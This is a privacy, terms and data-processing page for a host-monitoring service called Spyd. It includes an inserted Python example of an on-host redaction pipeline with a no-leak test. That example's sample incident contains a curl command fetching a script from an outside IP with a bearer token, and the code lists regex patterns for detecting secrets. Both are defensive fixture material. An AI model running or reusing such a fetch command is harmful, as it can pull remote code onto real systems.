Privacy & Terms
Spyd is privacy-first by design: full-fidelity data stays on your host, only a redacted shape leaves it, and nothing leaves until you consent. This page also covers our terms of service and data-processing commitments.
1. Who we are & lawful basis
For data processed through Spyd Cloud, you (the customer operating the monitored hosts) are the data controller and Spyd is the data processor. The legal entity is Spyd Infotech, United States.
Lawful basis: your recorded, versioned consent (shown once at install/enroll) plus legitimate interest in security monitoring of your own infrastructure.
2. What data moves, and where
| Tier | Where it lives | Contents |
|---|---|---|
| Local brain | This host only (brain.db) | Full-fidelity, per-host. Never transmitted. |
| Central brain | Spyd Cloud (api.spyd.sh) | Redacted aggregate that powers fleet learning + the cockpit. |
| AI analysis | Spyd proxy → OpenAI | Redacted incident context for an explanation; no AI key on the host. |
| Notifications | Channels you configure | Full fidelity by your choice; secrets still scrubbed. |
Egress is over HTTPS, signed with this host's Ed25519 key: incident sync (~30s), brain sync (periodic batch), and a 60-second heartbeat (liveness only — no monitoring data).
3. What is redacted before egress
Applied on the host by Spyd's redaction pipeline before anything leaves, and verified by an automated no-leak test:
| Class | Transform |
|---|---|
| Your IPs | Coarsened to /24 (IPv4) / /48 (IPv6); non-IPs dropped. |
| Usernames | Non-reversible per-org HMAC pseudonym (user_<hex>). |
| Command lines | Reduced to the executable family name (no args/paths). |
| Free text | Secret-scrubbed; embedded IPs coarsened. |
External threat indicators (security exception)
When a security detector flags a hostile external source (an attacker IP, a malicious domain, a mining-pool address), that indicator is preserved verbatim in the synced incident so "block the source" stays actionable. This never applies to your own data: internal IPs, usernames, hostnames and secrets remain redacted. Lawful basis: legitimate interest (security evidence).
Set privacy.preserve_threat_indicators: false to coarsen these too (privacy-maximal).
Local-only mode: decline consent (or set sync.mode: local_only) and nothing egresses; Spyd runs fully on-host with AI off.
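As an added example (not Spyd's code, and not a description of its actual pipeline), the following Python sketches a redaction pipeline with the transforms section 3 lists, the threat-indicator exception and its privacy-maximal switch, and the kind of no-leak check that sections 3 and 10 mention. The field names, the secret-pattern list, the `host_` prefix and the `leaks()` helper are assumptions. One deliberate step goes beyond the table: the incident's own username and hostname are also swapped for their pseudonyms inside free text, because a summary line such as "failed logins for alice" would otherwise carry the username past the pipeline, which is exactly what a no-leak corpus test is there to catch.

```python
"""Added example: an on-host redaction pipeline of the shape section 3 describes,
plus a no-leak check. Not Spyd's code; field names, secret patterns and the
host_ prefix are assumptions."""
import hashlib
import hmac
import ipaddress
import json
import re
import shlex

# Assumed secret shapes; the page does not publish its scrubber's rule set.
SECRET_PATTERNS = [
    re.compile(r"(?i)\b(?:password|passwd|token|secret|api[_-]?key)\s*[=:]\s*\S+"),
    re.compile(r"\bAKIA[0-9A-Z]{16}\b"),              # AWS access-key-id shape
    re.compile(r"(?i)\bBearer\s+[A-Za-z0-9._\-]+"),   # HTTP bearer token
]


def coarsen_ip(value):
    """IPv4 -> /24 network, IPv6 -> /48 network; a non-IP is dropped (None)."""
    try:
        addr = ipaddress.ip_address(value)
    except ValueError:
        return None
    prefix = 24 if addr.version == 4 else 48
    return str(ipaddress.ip_network(f"{addr}/{prefix}", strict=False))


def pseudonymize(value, org_key, prefix="user"):
    """Non-reversible per-org pseudonym: HMAC-SHA256 under the org key, truncated hex."""
    digest = hmac.new(org_key, value.encode(), hashlib.sha256).hexdigest()
    return f"{prefix}_{digest[:16]}"


def command_family(cmdline):
    """Keep only the executable's basename: no arguments, no paths."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:          # unbalanced quotes in a hostile command line
        argv = cmdline.split()
    return argv[0].rsplit("/", 1)[-1] if argv else ""


def scrub_text(text, replacements):
    """Free text: swap known identifiers for pseudonyms, scrub secrets, coarsen embedded IPs."""
    for raw, pseudo in replacements.items():
        text = re.sub(rf"\b{re.escape(raw)}\b", pseudo, text)
    for pat in SECRET_PATTERNS:
        text = pat.sub("[REDACTED]", text)
    out = []
    for tok in text.split(" "):
        core = tok.strip(",;.()[]\"'")          # tolerate trailing punctuation
        coarse = coarsen_ip(core) if core else None
        out.append(tok.replace(core, coarse) if coarse else tok)
    return " ".join(out)


def redact_incident(incident, org_key, preserve_threat_indicators=True):
    """Return the redacted shape that may leave the host."""
    user = pseudonymize(incident["username"], org_key, "user")
    host = pseudonymize(incident["hostname"], org_key, "host")   # host_ prefix is an assumption
    known = {incident["username"]: user, incident["hostname"]: host}
    indicators = incident.get("threat_indicators", [])
    if not preserve_threat_indicators:   # privacy-maximal: coarsen IPs, drop domains and pool addresses
        indicators = [c for c in (coarsen_ip(i) for i in indicators) if c]
    return {
        "kind": incident["kind"],
        "host": host,
        "user": user,
        "local_ip": coarsen_ip(incident["local_ip"]),
        "command": command_family(incident["cmdline"]),
        "summary": scrub_text(incident["summary"], known),
        # External indicators are kept verbatim so "block the source" stays actionable;
        # the same IP inside free text is still coarsened by scrub_text above.
        "threat_indicators": list(indicators),
    }


def leaks(incident, redacted, planted_secrets):
    """No-leak check: every raw identifier and planted secret must be absent from the egress shape."""
    blob = json.dumps(redacted)
    sensitive = [incident["username"], incident["hostname"], incident["local_ip"],
                 incident["cmdline"], *planted_secrets]
    return [v for v in sensitive if v in blob]


# Constructed sample incident and planted secrets (not real data).
ORG_KEY = b"constructed-per-org-key-not-a-real-secret"
PLANTED_SECRETS = ["abc123def456", "s3cr3t-value"]
SAMPLE_INCIDENT = {
    "kind": "ssh_bruteforce",
    "hostname": "web-01.corp.internal",
    "username": "alice",
    "local_ip": "10.1.2.3",
    "cmdline": "/usr/bin/curl -s http://203.0.113.7/x.sh -H 'Authorization: Bearer abc123def456'",
    "summary": "40 failed logins for alice from 203.0.113.7 on 10.1.2.3; token=s3cr3t-value found in env",
    "threat_indicators": ["203.0.113.7", "pool.example.net"],
}

if __name__ == "__main__":
    shape = redact_incident(SAMPLE_INCIDENT, ORG_KEY)
    print(json.dumps(shape, indent=2))
    assert leaks(SAMPLE_INCIDENT, shape, PLANTED_SECRETS) == []
```

The check in `leaks()` is the part worth keeping in a CI corpus test: plant known identifiers and secrets in a fixture incident, serialize the redacted shape exactly as the sync path would, and fail the build if any planted value survives as a substring. Note that the pseudonym is only as non-reversible as the org key is secret; a leaked key lets anyone with a candidate username confirm a match, which is why it is a per-org key and not a public salt.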
4. Retention
| Data | Retention |
|---|---|
| Central incidents / brain | 90 days default (org-configurable), then reaped daily. |
| Local on-host data | storage.retention_days = 30 default. |
| User sessions | 30 days (HttpOnly/Secure/SameSite cookies). |
| Magic-link tokens | 15 minutes, one-time. |
| Enrollment tokens | 24 hours, one-time. |
| Agent identity records | Until host/org deletion. |
| Audit log | Retained for the life of the account (no fixed expiry). |
5. Sub-processors
Third parties that process data on Spyd's behalf to deliver the service. We notify customers by email of additions before a new sub-processor begins processing, with the opportunity to object within 30 days.
| Sub-processor | Purpose | Region |
|---|---|---|
| OpenAI | AI incident explanation (via the Spyd proxy; redacted context only) | United States |
| Resend | Transactional email (magic-link sign-in, invites, notifications) | United States |
| Hetzner | Hosting (Postgres + app) and off-box backups (Object Storage) | Germany / Finland (EU) |
| Let's Encrypt | TLS certificates (ACME via Caddy) | — |
6. AI usage
- Provider & model: explanations are served through Spyd's hosted proxy to OpenAI (gpt-4o-mini, configurable server-side); the model is selected by Spyd Cloud.
- Keys never on your hosts: the OpenAI key is held only server-side; agents authenticate by their Ed25519 identity. Self-hosters may bring their own key (OpenAI / Anthropic / Ollama) via agent config.
- What is sent: only redacted incident context — redacted on the host before the request leaves. Prompts/responses are not logged or persisted.
- Never a dependency: if the proxy is unavailable, the agent falls back to local rule-based diagnosis; monitoring continues without AI.
- Limits: fleet-wide rate limiting (~5 req/s, burst 30). AI engages only after you accept the disclosure; revoke consent to turn it off.
7. International transfers
AI explanations are processed by OpenAI in the United States; redacted incident context only. Transfers rely on the EU Standard Contractual Clauses (SCCs). Hosting and backups are in the EU (Hetzner, Germany / Finland).
8. Your rights & controls
- Access: the session-protected cockpit lists your incidents, agents, and users.
- Erasure: deleting a host removes the agent and its cloud data; an organization owner can permanently delete the entire org and all its data from Settings → Danger zone in the cockpit.
- Restrict: revoke an agent (stops ingest, keeps record) or disable notifications.
- Local-only: decline or revoke consent to keep everything on-host.
- Portability: a self-service data-export endpoint is not yet available.
9. Terms of service
Spyd is a host-monitoring agent and an optional cloud control plane (Spyd Cloud / Cockpit). These terms are between you and Spyd Infotech ("Spyd").
- Accounts & enrollment: cloud access uses passwordless magic-link sign-in. You are responsible for the hosts you enroll and for your organization's credentials and enrollment tokens.
- Acceptable use: run Spyd only on systems you own or are authorized to monitor. Do not misuse the service to attack, probe, or disrupt third parties.
- Read-only on your hosts: Spyd runs diagnostic probes and never changes your system.
- Warranties & liability: the service is provided "as is", to the extent permitted by law.
- Changes & governing law: we may update these terms without prior notice; when a change is published we notify account owners by email. Governed by the laws of the United States.
10. Data processing (DPA)
Where Spyd processes personal data on your behalf, the customer is the controller and Spyd Infotech is the processor, acting only on the customer's documented instructions for the duration of the subscription. Full-fidelity data remains on the customer's hosts and is not processed by Spyd Cloud.
Technical & organizational measures
- Authenticity: Ed25519 request signing on every agent→cloud call, verified against the host's enrolled public key (the header key is not trusted after enrollment).
- Tenant isolation: Postgres Row-Level Security on all tenant tables; the app runs as a non-superuser with the org scope set per transaction.
- Encryption in transit: TLS everywhere (Let's Encrypt) with HSTS and a per-host content-security policy.
- Data minimization: on-host redaction pipeline, proven by an automated no-leak corpus test; idempotent ingest keyed by a content hash.
- Backups: nightly logical database dumps shipped off-box (EU).
Breach notification: Spyd notifies the controller without undue delay — within 72 hours of becoming aware of a personal-data breach — and makes available the information reasonably needed to demonstrate compliance.
Sub-processors are listed in section 5; transfers rely on the SCCs (section 7).
11. Contact
Privacy, terms, or data-processing questions: legal@spyd.sh. We bump disclosure_version and re-prompt hosts for consent on any material change to data movement or redaction.